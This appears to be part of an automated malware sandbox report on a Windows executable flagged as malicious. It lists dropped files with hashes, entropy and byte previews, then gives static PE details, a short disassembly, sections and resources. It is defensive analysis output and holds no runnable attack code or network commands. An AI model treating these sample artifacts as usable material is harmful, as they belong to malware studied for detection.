                                      SHA-256:4F3D8BCF5E55B6521A631653F4351FC8788963D371E634646D87576EA8E27A3D
                                      SHA-512:C81A0C7BC63C6EE8F15E7388221857B3FD302DF51A5BA3CF841A83C53F00CA58EE58FBEAEB7A6F9894FD1F2967DCCDE4CE63941D5E89FD914BC1CF05656AB025
                                      Malicious:false
                                      Preview:.!0.miIu.,..W.sK.E.......:L..\.M.G....{w.`............p....D.1|;.@.V0V.z:.I=e=.Y..wK.Y.E...UJ.o.'.{m..7.{...:...Gf....].]...z-x.?....U...o.Y.RwRf2e=Du....KY@..bw.........a....p.e......3....Q....*.9.<@+P1..j.@....C.A.F;M...?.....`.v|...[.._....O..9....q......m......-$CP.{.>?..}...........)r.Bkf.....~...8SW3..v.W`o...!.........1.....$..'..."r_gt5..+A....x.......rQwK..~[.c...~.k.T>b...+.c.......T#]lZ...P..7.O...,../...B......u/.Y......%v.7#b_s..^.0.I...(...s'..:..q?.+......|.YIF...zc......m...{V..BU.V...."S..k.6!.....mL.....I..T.....e.VY.C..I.., 1..|Q..v....0..E.....C...q..cW.#... .h...+=...{.w...*NM.xu.~.M..IS.S...C..QB..\.1..L....>.r......./..k]........}N..1.f...L.).\N.OV...6>..%.2.,.....Q.gBc.q..y?...N.........q.u.>9...r..i$....\..t.....'.P.#.6.rroA.&....Zb.K.vN.<..N..eam..".2.....a...@.....x.[.jl.]i.BA(g...i.. (..|u....S.B.,X..K. .H9A&.Q...=.I..^~..f....Y...T..bw\0.bH.....&..ht.W.....y&.,.&.C.|./-t..?...2=.......5=...C.M).e0
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):12288
                                      Entropy (8bit):4.75917671841192
                                      Encrypted:false
                                      SSDEEP:192:jlXu90dzlyWpfTaaWs23HjVpx/ARdYlnnnnnnnnnnEBPDSmw/DvRfutO1kk:jlTbyuT2sWjtudtIDvFQg
                                      MD5:C897DAFB9E9F77D5114B36DF03B849A1
                                      SHA1:093A220D943739C6F5D3577C7F85EDF7C9AAB399
                                      SHA-256:86E73888D8945D203B7B32D93D90B8A288E3A4889462A97D31D0DAF22B40641E
                                      SHA-512:C39C30C9A902097107F3218847B711254DDC24943DF90CAC62AC2F3B2EDE627D8B6881CB313C3525610D3B87C3BAA8C203F6601E94AC07A988DFA20C2C6DD60A
                                      Malicious:false
                                      Preview:......J.......J.;.....J.......J.......J.......J.......J..... .J.;...8.J.....H.J.....T.J.....`.J.....l.J.;.....J.. ....J.. ....J.. ....J.; ....J..$....J..$....J..$....J.;$....J..(....J..(....J..(....J..,.. .J..,..,.J..,..8.J..0..D.J..0..P.J..0..\.J..4..h.J..4..t.J..4....J..8....J..8....J..<....J..<....J..@....J..@....J..D....J..H....J..L....J..P....J..|....J..|....J...I.B.....J.,.....J.q.....J.....(.J.....4.J.....@.J.....L.J.....X.J.....d.J.....p.J.....|.J.......J.......J.......J.......J.......J.C.....J.......J.......J.....h.J.).....J.......J.k...(.J.!.....J.c... .J.....$.J.D...0.J.}...<.J.....(.J.....T.J.E...@.J.....`.J.G...l.J.....H.J.....x.J.H...P.J.......J.......J.......J.I.....J.......J.....(.J.A.....J.....X.J.......J.J...`.J.......J.......J.......J.......J.......J.......J.....$.J.....0.J.....<.J.....H.J.....T.J.K...`.J.....l.J.....h.J.....x.J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J..... .J.....,.J.....8.J.....D.J.....
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):168
                                      Entropy (8bit):4.359094565849235
                                      Encrypted:false
                                      SSDEEP:3:TJZcACJ7HWUqt/vllpfrYZcFTS9gXeF+X32ZpAe:teAKhqjvVg3F+X32N
                                      MD5:A94F23723EAABC72A8FB2AD485C8F759
                                      SHA1:3EC94C2EBD1B2572EE4C8472CCBE5C27AE5A3B60
                                      SHA-256:88351214F3762DF6F883442A84905417A2096948F3DDEA7A91F405DFDD5F9C50
                                      SHA-512:74C84A0AD73C680FB31FC4E45389428DAE51E64C5FD670E6C597FA92EBD96CABDE9B8F8186E39FAB34BCF6C71A05E2F1A7E9C8426A70F952F0C3A2E45BF1EE2D
                                      Malicious:false
                                      Preview:rapidconfidentialityspokedrill..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):175104
                                      Entropy (8bit):7.998931477420223
                                      Encrypted:true
                                      SSDEEP:3072:PpDBJ3GkHAYYzF89/An7xZmRfGnBEP+HR44KGZPe5TVuhArtc:FWpYYx89Y1ZWfGEO44KGI4hsc
                                      MD5:0F7CF510C583F794073D3E609A1471F0
                                      SHA1:68A74D6B1BA8BB2CBA3109D01D27C28A76806742
                                      SHA-256:9CAD5AE241421A9ADE841171CDA0206D086956B7CC965E6E7254D0C48AAF008F
                                      SHA-512:F4F4AB5B09778DA7F48A0E24FC427B4E83CD4CDE44600FB6DA3ECDE12D09AFEEECFCD7F2E4E49D98ED9A4FC0F8B575FF89FB15155F71B95E0A61C62290B99753
                                      Malicious:false
                                      Preview:....z....P...Gx.XT`.. .....,..5u.^.=...8$....:...x..9.O......sl*..v....H.....).....k{+<0..e.....*..d..p..A^.3..Bz.e..`KE....D.JJ.1.A.l..w.........L)"..~..W...ZA.......vl..@....I...c'V.!. .i.0..!......<..g..^...\y.2.O._.i&....M.U...z(.'{.nr$..... .... .6./.:.a......Q..].<....}..t2.C....$.qW..C......H.k.3..h.^..{.V.`...d..}........ klv.b\F..=.M>5...n...r.W_.....D.Z_B...Q..b./....6O8..Z....QC...a.....pI..._/..K.....f..g=.{...Y....-...4....o...t....)o..~3...Y..a&.q....~.M>..p.u+g.....%o.`......%...A./t".........UA..~{.,...dI...WI...-|J...~.5..b.#..X..*\..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rp...O.M.'.F...h.................1.......1...kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K...
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):46080
                                      Entropy (8bit):6.648912916021988
                                      Encrypted:false
                                      SSDEEP:768:uNK1dvq6LqgaHbdMNkNDUySdK8M4INduPbOUGM4INduPbOU+aI4kSmC:dvtmgMbFuyO1MBNfMBNBo
                                      MD5:380BEBAEAC764D73E0318B9639AE26B8
                                      SHA1:56B8D88A77EB4EE735936C69BC72E16682E2AD52
                                      SHA-256:7ED632F8F8EDB75829C3AA85BAC5539FC6D6EC51816018812E6B79277662E951
                                      SHA-512:B8AC2BF4664BAFEA1A3FE9F66A7464EC0F59FFD8A1D0A89397E47D6BB9C1BB5E5D2D79F3D24C4CFCD560E486E1B7784C510A8BF5821CCA83910382411062ECC7
                                      Malicious:false
                                      Preview:....tKI......KI. ....LI.!....LI."....NI.x...@OI.y...`OI.z...|OI.......K......OI.R.6.0.0.2.....-. .f.l.o.a.t.i.n.g. .p.o.i.n.t. .s.u.p.p.o.r.t. .n.o.t. .l.o.a.d.e.d.............R.6.0.0.8.....-. .n.o.t. .e.n.o.u.g.h. .s.p.a.c.e. .f.o.r. .a.r.g.u.m.e.n.t.s...........R.6.0.0.9.....-. .n.o.t. .e.n.o.u.g.h. .s.p.a.c.e. .f.o.r. .e.n.v.i.r.o.n.m.e.n.t.......R.6.0.1.0.....-. .a.b.o.r.t.(.). .h.a.s. .b.e.e.n. .c.a.l.l.e.d.........R.6.0.1.6.....-. .n.o.t. .e.n.o.u.g.h. .s.p.a.c.e. .f.o.r. .t.h.r.e.a.d. .d.a.t.a.......R.6.0.1.7.....-. .u.n.e.x.p.e.c.t.e.d. .m.u.l.t.i.t.h.r.e.a.d. .l.o.c.k. .e.r.r.o.r.............R.6.0.1.8.....-. .u.n.e.x.p.e.c.t.e.d. .h.e.a.p. .e.r.r.o.r.............R.6.0.1.9.....-. .u.n.a.b.l.e. .t.o. .o.p.e.n. .c.o.n.s.o.l.e. .d.e.v.i.c.e.............R.6.0.2.4.....-. .n.o.t. .e.n.o.u.g.h. .s.p.a.c.e. .f.o.r. ._.o.n.e.x.i.t./.a.t.e.x.i.t. .t.a.b.l.e.............R.6.0.2.5.....-. .p.u.r.e. .v.i.r.t.u.a.l. .f.u.n.c.t.i.o.n. .c.a.l.l...........R.6.0.2.6.....-. .n.o.t. .e.n.o.u.g.h. .
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):45736
                                      Entropy (8bit):6.954977555616171
                                      Encrypted:false
                                      SSDEEP:768:UUxrUCVoyOQ5DuOKHnPiamE9w97OUg4eVDqp8VQ7A:XxrnVRCOa69E9wFOUg/Rqp8b
                                      MD5:DD30CA8675934FB15AEBF3B8AA7FF6F9
                                      SHA1:A75B72300E4C24027756862C3A7E48A3D8F268F7
                                      SHA-256:AE73A9A8258A7F950B35C228975EB5342DBF9D967BB02D7C63DE4946DAD82275
                                      SHA-512:79BACE600688CAA532B405249BC147228ADEEF2A6CFB25408602D7E0637650457355C3DCBC1C8CC954EA23649A3EC2A7C1F0C910DB1035BB114AB75432071D6A
                                      Malicious:false
                                      Preview:........................```.............................................................hhh.................................lll.vvv.|||.rpn.rnk.xrn.}wr.|vq.vpl.pmj.pnl.|||.xxx.ooo.................................```.....................................................................fff.....................................lll.ddd.iii.ppp.ttt.ttt.ppp.kkk.ccc.mmm.....................................```.............................................................................dddxppp.................................................................................................nnn.YYYv.......................................................................................0ggg.........................................................................................bbb.aaa/................................................................................................qqqHhhh.........................................................................eee.aaaF....................................
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):46080
                                      Entropy (8bit):4.822125287417449
                                      Encrypted:false
                                      SSDEEP:384:3iwxFr9LE/MpfhwHLWAkqLyH3Per2Wfn2HuboETcKiKjxqH:35bAGWrT+UTcL4qH
                                      MD5:B8B034328B710A4AE4B606653AE1EA22
                                      SHA1:72C3749B4702C9626683180DCA7E816FDBE84AE4
                                      SHA-256:4A95761D77AE6A3DD2881EE0E407F5600755DAE6396559A8C7F1388D5C382526
                                      SHA-512:FE04D36AB451DA8EC08F1825B577250775550AEF87E200908AFAFF9A02C507895D5F09AC065F7529B92A4B27637D26509371AEA2F5E07CA15860395275F3744B
                                      Malicious:false
                                      Preview:m.m.m.m.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.m.m.m.m.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.m.m.m.m.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................m.m.................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                      Category:modified
                                      Size (bytes):1026
                                      Entropy (8bit):4.693522326362693
                                      Encrypted:false
                                      SSDEEP:24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
                                      MD5:77EC10F00D9B9E14ECB007C137CF869E
                                      SHA1:F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
                                      SHA-256:22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
                                      SHA-512:AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
                                      Malicious:false
                                      Preview:XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):27648
                                      Entropy (8bit):6.749930753107392
                                      Encrypted:false
                                      SSDEEP:768:rn5ETavrYFdjVe1XN9Tmv+zD2jsiER24an73S21DU:D5E22VelTXzSj9xb7XDU
                                      MD5:E96D375AF7A36E051E3A986E138FCC38
                                      SHA1:A1238B70F097D5DF81E90A513F37682091780D37
                                      SHA-256:307AEE7C37C09991CF35E789EF76A9B57A4E4F73F48E647FF2E4A06F2DF88DF8
                                      SHA-512:22D8C4F8AA49242AD330931933ED8A984F67D0099FAD4399283994948D2341AAEE3D0C8660B11BC57C9FECEADC054263FB61817C20E70C838442228A13415A4D
                                      Malicious:false
                                      Preview:...@..M..4..n...E.P.M..3..f.}..t..M...o....rL.F.....;p.r...,...F..E...rL.......@.H;.u.....E......M...n....,...G..M.j..4........t.F;w r..O....G,......e....= .I..D$.PVVVh.>J..t$$...uu.D$.3.j.@Z.........Q....YP.L$<..A...t$8.D$.PV3.PPh.>J..t$$...u..D$.3...D$.Vf..F.L$........D$<..u.P.....YV.....Y3..t$.....I.....)/..3.3.f.D$HV.L$../...V.L$.f..f.D$.3.f.D$......f98t#V.L$......f.8;t..D$.P.D$LP..,..YY.s.D$HP.7+..Y..t$.D$HP.(+..Yf.|DF\t..D$HhL,I.P.,..YY.D$HP.L$<......D$8..rL.P.)J...L$8.B...3..L$.Vf.D$L....f98..b...F.<...3.f.......E.jXj.....E.P.,...e............E.E..E.X....E.X.K..E.....P.E.x.K..E......E......E...K.....I...u.2.../..........P...........GT.......t...j...C;_Xr..N/...v..N...Y./.......C..G.../.......C..F..81....1...E..t.V.....Y....2...7......w......YY..2.....G......G.......?...G..W..95...G..G......<5..H.........C....P..=..P.C..7....K...AQ.3V......5..=....s<.E..E..y...H.K..]..E....dK..}...E.......E..m..}..E..m..e5..=....s<.E..E..y...H.K..]..E....cK..}...E.......E..m..}..E
                                      Process:C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):0.8439810553697228
                                      Encrypted:false
                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                      Category:dropped
                                      Size (bytes):196608
                                      Entropy (8bit):1.121297215059106
                                      Encrypted:false
                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                      Category:dropped
                                      Size (bytes):106496
                                      Entropy (8bit):1.136413900497188
                                      Encrypted:false
                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                      MD5:429F49156428FD53EB06FC82088FD324
                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\explorer.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):345600
                                      Entropy (8bit):4.084859162807512
                                      Encrypted:false
                                      SSDEEP:3072:3i2YQ2pbPh1mJ8XrMg8Nwrppwbg0z3TH:38Q2pbJcJz/2Mgq3T
                                      MD5:1AAE19C81605BF0A5851E42E3574A83C
                                      SHA1:BA91BCC371D24BA57458BA4A2AA82BC83447A129
                                      SHA-256:7C7CDED8D1C0784881859ED03340D81C24EA9BF5D9972963CEDF0E40B9856A0C
                                      SHA-512:8BCF76009E5503C598E2080DCFA9FB1E74783786DFC028EE4CBB066D79D2F4B22C9DF962B6D89EA4429E23BCCB9641574AF3B03BC556D250295C236154B9DBC5
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 34%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z.............mZ.....mo.....m[.....cb............m^.....mk.....ml....Rich............................PE..L.....jd.................&..........O#.......@....@..........................................................................h..d....P...............................i..............................pb..@............@...............................text....%.......&.................. ..`.rdata...1...@...2...*..............@..@.data............L...\..............@....mazi........ ......................@..@.sicas..F....0......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\explorer.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):4.084859162807512
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:345'600 bytes
                                      MD5:1aae19c81605bf0a5851e42e3574a83c
                                      SHA1:ba91bcc371d24ba57458ba4a2aa82bc83447a129
                                      SHA256:7c7cded8d1c0784881859ed03340d81c24ea9bf5d9972963cedf0e40b9856a0c
                                      SHA512:8bcf76009e5503c598e2080dcfa9fb1e74783786dfc028ee4cbb066d79d2f4b22c9df962b6d89ea4429e23bccb9641574af3b03bc556d250295c236154b9dbc5
                                      SSDEEP:3072:3i2YQ2pbPh1mJ8XrMg8Nwrppwbg0z3TH:38Q2pbJcJz/2Mgq3T
                                      TLSH:B374D01175E4D036E07345B408B8D6F02A3A7C53EBB5958F3A983F7F3D726921A25362
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z...............mZ......mo......m[......cb..............m^......mk......ml.....Rich............................PE..L.....jd...
                                      Icon Hash:63796de971636e0f
                                      Entrypoint:0x40234f
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                      Time Stamp:0x646A8C2E [Sun May 21 21:25:02 2023 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:1bf8ebf879fee654fc9a3ea11df395e2
                                      Instruction
                                      call 00007F80B0B311BAh
                                      jmp 00007F80B0B2ED6Eh
                                      push edi
                                      mov eax, esi
                                      and eax, 0Fh
                                      test eax, eax
                                      jne 00007F80B0B2EFA7h
                                      mov edx, ecx
                                      and ecx, 7Fh
                                      shr edx, 07h
                                      je 00007F80B0B2EF47h
                                      jmp 00007F80B0B2EEE8h
                                      lea ebx, dword ptr [ebx+00000000h]
                                      movdqa xmm0, dqword ptr [esi]
                                      movdqa xmm1, dqword ptr [esi+10h]
                                      movdqa xmm2, dqword ptr [esi+20h]
                                      movdqa xmm3, dqword ptr [esi+30h]
                                      movdqa dqword ptr [edi], xmm0
                                      movdqa dqword ptr [edi+10h], xmm1
                                      movdqa dqword ptr [edi+20h], xmm2
                                      movdqa dqword ptr [edi+30h], xmm3
                                      movdqa xmm4, dqword ptr [esi+40h]
                                      movdqa xmm5, dqword ptr [esi+50h]
                                      movdqa xmm6, dqword ptr [esi+60h]
                                      movdqa xmm7, dqword ptr [esi+70h]
                                      movdqa dqword ptr [edi+40h], xmm4
                                      movdqa dqword ptr [edi+50h], xmm5
                                      movdqa dqword ptr [edi+60h], xmm6
                                      movdqa dqword ptr [edi+70h], xmm7
                                      lea esi, dword ptr [esi+00000080h]
                                      lea edi, dword ptr [edi+00000080h]
                                      dec edx
                                      jne 00007F80B0B2EE85h
                                      test ecx, ecx
                                      je 00007F80B0B2EF2Bh
                                      mov edx, ecx
                                      shr edx, 04h
                                      test edx, edx
                                      je 00007F80B0B2EEF9h
                                      lea ebx, dword ptr [ebx+00000000h]
                                      movdqa xmm0, dqword ptr [esi]
                                      movdqa dqword ptr [edi], xmm0
                                      lea esi, dword ptr [esi+10h]
                                      lea edi, dword ptr [edi+10h]
                                      dec edx
                                      jne 00007F80B0B2EED1h
                                      and ecx, 0Fh
                                      je 00007F80B0B2EF06h
                                      mov eax, ecx
                                      shr ecx, 02h
                                      je 00007F80B0B2EEEFh
                                      mov edx, dword ptr [esi]
                                      mov dword ptr [edi], edx
                                      lea esi, dword ptr [esi+04h]
                                      lea edi, dword ptr [edi+04h]
                                      dec ecx
                                      jne 00007F80B0B2EED5h
                                      mov ecx, eax
                                      and ecx, 00000000h
                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [IMP] VS2008 SP1 build 30729
                                      • [RES] VS2010 build 30319
                                      • [LNK] VS2010 build 30319
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x268b80x64.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c950000x7fe8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x2691c0x1c.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x262700x40.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x240000x198.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x225fe0x22600938827d9d1ec5a427ee6f74cadfe1da7False0.7392542613636364data6.979655173728229IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x240000x31be0x3200f3ea2c7ca6e2aff78c480fddb493366eFalse0.35140625data4.9739377470741974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x280000x1c696a80x24c00024e93736ae5638d80847d98babcaa23unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .mazi0x1c920000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .sicas0x1c930000x18460x1a003c63825015aabd810674f44afac6d12bFalse0.004356971153846154data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .rsrc0x1c950000x7fe80x8000c55c97f90ba612f35614fc875d3017dcFalse0.321746826171875data4.11911523664306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_CURSOR0x1c985d00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                      RT_CURSOR0x1c987000xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                      RT_CURSOR0x1c987d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                      RT_CURSOR0x1c996800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                      RT_CURSOR0x1c99f280x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                      RT_CURSOR0x1c9a4c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                      RT_CURSOR0x1c9b3680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                      RT_CURSOR0x1c9bc100x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                      RT_ICON0x1c954800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TeluguIndia0.5368663594470046
                                      RT_ICON0x1c95b480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TeluguIndia0.41358921161825724
                                      RT_ICON0x1c980f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TeluguIndia0.449468085106383
                                      RT_STRING0x1c9c4380x650dataTeluguIndia0.4306930693069307
